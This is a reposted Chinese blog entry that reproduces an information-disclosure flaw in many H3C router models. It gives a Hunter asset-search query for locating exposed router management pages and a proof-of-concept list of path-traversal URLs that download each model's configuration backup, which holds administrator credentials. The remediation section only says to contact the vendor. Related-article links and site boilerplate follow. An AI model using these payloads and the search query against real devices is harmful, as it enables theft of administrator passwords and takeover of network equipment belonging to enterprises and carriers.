【漏洞复现】H3C 路由器多系列信息泄露漏洞

这篇具有很好参考价值的文章主要介绍了【漏洞复现】H3C 路由器多系列信息泄露漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Nx01 产品简介

        H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。

Nx02 漏洞描述

        H3C路由器多系列存在信息泄露漏洞,攻击者可以利用该漏洞获取备份文件中的管理员账户及密码等敏感信息。

Nx03 产品主页

hunter-query:app.name="H3C Router Management"

【漏洞复现】H3C 路由器多系列信息泄露漏洞,【漏洞复现】,安全,服务器,web安全,网络

Nx04 漏洞复现

POC:

/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

【漏洞复现】H3C 路由器多系列信息泄露漏洞,【漏洞复现】,安全,服务器,web安全,网络

Nx05 修复建议

建议联系软件厂商进行处理。文章来源地址https://www.toymoban.com/news/detail-831259.html

到了这里,关于【漏洞复现】H3C 路由器多系列信息泄露漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • H3C路由器如何配置SSH服务?

    通常设备会放在弱电箱里而我们的办公地点往往不在同一个地方,为了更加便捷的对设备进行管理我们通常会使用TelentSSH服务。 这边不再重述过多定义,您可以直接理解为他是可以实现利用IP网络对设备进行 远程管理 登录的一种功能,如需定义可自行百度,本文以配置教学

    2024年02月07日
    浏览(42)
  • 配置H3C路由器时常遇到的错误

    当一个路由器出现配置错误时,那么就会留下安全隐患,要么上不网,要么使用某个网络应用时出现故障,本篇以H3C路由器给大家介绍,在配置时比较容易出现问题的几个方面,希望可以帮助到大家。   一、多线路设置 随着网络应用的不断增加,公司原本的带宽已经不够用

    2024年02月05日
    浏览(57)
  • H3C路由器如何配置Telnet服务?

    通常设备会放在弱电箱里而我们的办公地点往往不在同一个地方,为了更加便捷的对设备进行管理我们通常会使用TelentSSH服务。 这边不再重述过多定义,您可以直接理解为他是可以实现利用网络对设备进行远程管理登录的一种功能,如需定义可自行百度,本文以配置教学为主

    2024年02月13日
    浏览(39)
  • H3C路由器静态转发的设置介绍

      一、本文要给大家介绍的是如何设置H3C路由的静态转发,在这之前,我们先了解一下什么是静态NAT,假设我们的目标是将互联网上的静态IP通过路由器转换为内部网络IP,对于带有网页设置界面的路由器来说,这个工作实现起来很简单,但有时我们只能采用命令行方法设置,

    2024年02月05日
    浏览(43)
  • H3C交换机+路由器配置VRRP路由冗余

    一、先上拓扑:  二、简介: 注意:下文均为笔者根据自己理解所写,可能存在不准确(所用名词或解释不够专业性),请自行斟酌,不过可以确认的是,通过本文配置,读者可以大体理解标题所述(VRRP)的配置方法和部分特性,可以配置出一个 基本的 VRRP环境。 1、vrrp(

    2024年02月06日
    浏览(46)
  • H3C路由器不能传递的故障如何解决

    在使用路由器的过程中,难免会遇到各种各样的故障,本文主要以H3C路由器为例,为大家分析在路由组网环境中,上游不能被下游学习到故障的原因和解决步骤,相信对大家一定有所帮助。 一、组网环境 组播数据通过二层转发到华为A,华为A上用VLANIF口终结该组播源的VLAN信

    2024年02月05日
    浏览(39)
  • H3C路由器的时间和域名特殊解析

      一、路由器的时间不对造成的危害还是蛮大的,现在我们就给大家解决这个问题,进入H3C路由基本设置-时间设置,此项主要用于设置路由器的系统时间,打开时间设置界面,将显示如下界面: 1、路由时间:显示路由器的当前时间,若外网未通,则显示默认时间。 2、时区

    2024年02月05日
    浏览(48)
  • 办公管理利器 H3C流行路由器的介绍

      一、QoS的传统功能无法管控Web网页中的视频流量大小,那么我们就需要一种针对Web视频的QoS功能,而H3C流行路由器就具有这样的功能,它利用网络的行为应用作辨认,进而进行频宽上的分配,为新一代更细致的QoS,透过流量行为应用结合,是中小企业的信息化提供一种更细

    2024年02月05日
    浏览(47)
  • 配置H3C路由器汇聚和链路的方法

      一、当路由信息在ABR 中进行处理时,对于一个配置了路由聚合的网段,只发送一条聚合路由。一个区域可多次配置路由聚合。当ABR向其它区域发送路由信息时,以网段为单位生成Sum_net_LSA。若该网段范围用notadvertise限定,则到这一网段路由的路由信息将不会被广播出

    2024年02月05日
    浏览(37)
  • H3C路由器(通用)限速(命令行)配置方法

    1 配置需求或说明 1.1 适用产品系列 本手册适用于如下产品:MSR 全系列路由器 1.2 配置需求及实现的效果 MSR路由器G0/0接口连接公网,G0/1接口连接内网,内网网关地址为MSR路由器VLAN1虚接口地址192.168.1.1/24,需要实现对内网IP地址范围为192.168.1.2—192.168.1.254的终端进行限速,每

    2024年02月09日
    浏览(33)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包